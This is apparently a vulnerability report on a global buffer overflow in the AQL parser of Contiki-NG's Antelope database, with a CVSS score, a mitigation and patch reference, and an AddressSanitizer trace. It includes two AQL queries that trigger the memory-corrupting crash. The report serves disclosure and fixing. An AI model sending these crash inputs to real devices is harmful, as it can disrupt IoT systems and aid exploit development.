Global buffer overflow while parsing AQL (lvm_set_op, lvm_set_relation, lvm_set_operand)

[cve-reporting]

Functions lvm_set_op, lvm_set_relation, lvm_set_operand try to memcpy input data (part of AQL files) into fixed size buffer lvm_instance_t->vmcode.
Allocated buffer can fit only DB_VM_BYTECODE_SIZE (128) bytes and the check is missing.

Declaration:

db-options.h:110:
#define DB_VM_BYTECODE_SIZE 128

aql-parser.c:108:
static unsigned char vmcode[DB_VM_BYTECODE_SIZE];

This could potentially lead to Remote Code Execution, but attack is more difficult, because buffer is stored in global data segment and buffer is filled with bytecode, not directly by user provided data (Attack Complexity:High).
The risk of this issue is reduced (Attack Vector:Local) because attacker would need to run malicious AQL query, however it is quite possible when using database in IoT application.

Proposed CVSS score:
CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H (8.1 - high)

Following AQL code samples will trigger crash:
(crash_003.sql):
REMOVE FROM aaa WHERE a - ( 000000000 / COUNT a - INLINE a - TYPE 000000000 / / a / < a - - a - TYPE 000000000 / TYPE 000000000 / / a / < a - MIN a - TYPE a - / a / < a - - a / / a / < a - - a - TYPE 000000000 - <- 000000000 / a / / 000000000 / / a / < a - - a aaa aaa 000000000 / - a SUM - ( FROM . ( a INTO ( aaa INTO , aaa STRING # aaa STRING (;

(crash_004.sql):
SELECT aaa FROM a WHERE aaa <= a / COUNT a - - a - TYPE 000000000 * / a / < a - - a - TYPE 000000000 / a / < a - - a - TYPE 000000000 / a / / a - TYPE 000000000 / RELATION a / < a - - a - TYPE 000000000 / / a / < a - - a - <- 000000000 / < a / COUNT a - - a - TYPE 000000000 * / a / < a - - a - TYPE 000000000 / a / < a - - a - aaa INTO / a / / a - TYPE 000000000 / / a / < a - - a - TYPE 000000000 PROJECT / a / < a + - a - <- 000000000 / a / / 000000000 / a - - a - TYPE 000000000 / a / / 000000000 / a - - a - TYPE 000000000 / / a / < a * a IN STRING a (

Mitigation :

The size of input string should be limited to DB_VM_BYTECODE_SIZE.

Please take a look at patch fixing this issue in TizenRT (using antelope engine as arastorage):
Samsung/TizenRT@e024d3c

Crash details using Address Sanitizer:

=================================================================
==11197==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000061c080 at pc 0x000000411d94 bp 0x7ffc13e01600 sp 0x7ffc13e015f0
WRITE of size 4 at 0x00000061c080 thread T0
#0 0x411d93 in lvm_set_type contiki-ng/os/storage/antelope/lvm.c:375
#1 0x411d93 in lvm_set_operand contiki-ng/os/storage/antelope/lvm.c:425
#2 0x411d93 in lvm_set_variable contiki-ng/os/storage/antelope/lvm.c:486
#3 0x40308d in parse_operand contiki-ng/os/storage/antelope/aql-parser.c:273
#4 0x40308d in parse_expr contiki-ng/os/storage/antelope/aql-parser.c:306
#5 0x403367 in parse_expr contiki-ng/os/storage/antelope/aql-parser.c:321
#6 0x403367 in parse_expr contiki-ng/os/storage/antelope/aql-parser.c:321
#7 0x403367 in parse_expr contiki-ng/os/storage/antelope/aql-parser.c:321
#8 0x403367 in parse_expr contiki-ng/os/storage/antelope/aql-parser.c:321
#9 0x403367 in parse_expr contiki-ng/os/storage/antelope/aql-parser.c:321
#10 0x403367 in parse_expr contiki-ng/os/storage/antelope/aql-parser.c:321
#11 0x406853 in parse_comparison contiki-ng/os/storage/antelope/aql-parser.c:358
#12 0x406853 in parse_where contiki-ng/os/storage/antelope/aql-parser.c:408
#13 0x406853 in parse_remove_from contiki-ng/os/storage/antelope/aql-parser.c:568
#14 0x406853 in parse_remove contiki-ng/os/storage/antelope/aql-parser.c:611
#15 0x406853 in aql_parse contiki-ng/os/storage/antelope/aql-parser.c:832
#16 0x4019c1 in main contiki-ng/os/storage/antelope/test_aql.c:218
#17 0x7f7092fe282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#18 0x401c38 in _start (contiki-ng/os/storage/antelope/test_aql_asan.exe+0x401c38)

0x00000061c080 is located 32 bytes to the left of global variable 'p' defined in 'aql-parser.c:107:23' (0x61c0a0) of size 24
0x00000061c080 is located 0 bytes to the right of global variable 'vmcode' defined in 'aql-parser.c:108:22' (0x61c000) of size 128
SUMMARY: AddressSanitizer: global-buffer-overflow contiki-ng/os/storage/antelope/lvm.c:375 lvm_set_type
Shadow bytes around the buggy address:
0x0000800bb7c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000800bb7d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000800bb7e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000800bb7f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000800bb800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0000800bb810:[f9]f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 f9 f9 f9
0x0000800bb820: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0000800bb830: 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
0x0000800bb840: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
0x0000800bb850: 00 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
0x0000800bb860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==11197==ABORTING